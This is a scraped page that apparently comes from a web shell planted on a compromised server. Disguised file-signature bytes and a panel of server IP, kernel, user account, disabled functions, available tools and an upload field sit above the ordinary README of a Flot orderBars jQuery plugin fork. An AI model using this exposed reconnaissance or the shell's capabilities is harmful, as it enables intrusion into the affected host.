%PDF-1.7 GIF89;
Server IP : 5.161.254.237 / Your IP : 216.73.216.134 Web Server : Apache System : Linux diamond.sialwebvps.com 4.18.0-553.8.1.el8_10.x86_64 #1 SMP Tue Jul 2 07:26:33 EDT 2024 x86_64 User : stellasp ( 1131) PHP Version : 7.4.33 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/stellasp/public_html/backend/vendors/flot.orderbars/ |
Upload File : |
flot-orderBars ============== Fork of the Flot OrderBars plugin found here: http://www.benjaminbuffet.com/public/js/jquery.flot.orderBars.js Improvements ============ ### Compatability with Flot Stack Plugin The main improvement I've made is compatability with the [Flot Stack plugin](https://github.com/flot/flot/blob/master/jquery.flot.stack.js). To use the 2 together: * Ensure that your data is well formed. Each series should contain a bars object with an order integer, like so: ```javascript var series = []; series.push({ data: [], // your raw data bars: { order: 0 } }); series.push({ data: [], // your raw data bars: { order: 1 } }); ``` * Ensure that the order bars plugin is loaded __before__ the stack plugin. See the example for more information.